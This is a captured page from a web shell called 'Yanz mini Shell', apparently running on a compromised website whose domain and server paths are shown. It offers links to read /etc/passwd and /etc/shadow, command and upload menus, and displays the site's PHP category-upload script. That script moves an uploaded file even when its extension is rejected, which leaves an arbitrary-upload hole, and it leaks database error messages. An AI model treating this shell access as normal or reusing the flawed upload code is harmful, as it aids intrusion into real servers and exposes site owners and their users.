Yanz mini Shell

[ HomeShell 1 ] [ HomeShell 2 ] [ Upload ] [ Command Shell ] [ Scripting ] [ About ]

[ Directory ] =>

/

home

firstmatrixcoin

public_html

ocean-arc.firstmatrix.co.in

plugins

fullcalendar

Action

[*] New File
[*] New Folder

Sensitive File

[*] /etc/passwd
[*] /etc/shadow
[*] /etc/resolv.conf

[ Delete ] [ Edit ] [ Rename ] [ Back ]

<?php
header('Content-Type: application/json');
include '../../config/config.php';

error_log("Category creation request received");

$errors = [];

// Sanitize input
define('FILTER_SANITIZE', FILTER_SANITIZE_STRING);
function sanitizeInput($data) {
    return filter_var(trim($data), FILTER_SANITIZE);
}

// Validate required fields
$name = isset($_POST['category_name']) ? sanitizeInput($_POST['category_name']) : '';
if (empty($name)) {
    $errors[] = "Field 'category_name' is required";
}

// Optional fields
$status = isset($_POST['status']) ? sanitizeInput($_POST['status']) : 'Active';

// Handle image upload
$uploadDir = '../../uploads/categories/';
$allowedExtensions = ['jpg', 'jpeg', 'png', 'gif'];
$imagePath = null;

if (!empty($_FILES['image']['name'])) {
    $fileName = $_FILES['image']['name'];
    $fileTmpName = $_FILES['image']['tmp_name'];
    $fileSize = $_FILES['image']['size'];
    $fileExt = strtolower(pathinfo($fileName, PATHINFO_EXTENSION));

if (!in_array($fileExt, $allowedExtensions)) {
        $errors[] = "Invalid file type. Allowed types: jpg, jpeg, png, gif.";
    }

if ($fileSize > 2 * 1024 * 1024) {
        $errors[] = "File size exceeds 2MB.";
    }

if (!is_dir($uploadDir)) {
        mkdir($uploadDir, 0777, true);
    }

$newFileName = uniqid('category_') . '.' . $fileExt;
    $fullPath = $uploadDir . $newFileName;

if (!move_uploaded_file($fileTmpName, $fullPath)) {
        $errors[] = "Failed to upload image.";
    } else {
        $imagePath = 'uploads/categories/' . $newFileName;
    }
}

// Return validation errors
if (!empty($errors)) {
    echo json_encode(['status' => 'error', 'message' => $errors]);
    exit;
}

try {
    $stmt = $pdo->prepare("INSERT INTO tbl_category (name, image, status) VALUES (:name, :image, :status)");
    $stmt->bindParam(':name', $name);
    $stmt->bindParam(':image', $imagePath);
    $stmt->bindParam(':status', $status);

if ($stmt->execute()) {
        echo json_encode(['status' => 'success', 'message' => 'Category created successfully']);
    } else {
        echo json_encode(['status' => 'error', 'message' => 'Failed to insert category']);
    }
} catch (PDOException $e) {
    error_log("DB Error: " . $e->getMessage());
    echo json_encode(['status' => 'error', 'message' => 'Database error: ' . $e->getMessage()]);
}
?>

Free Space : 11529261056 Byte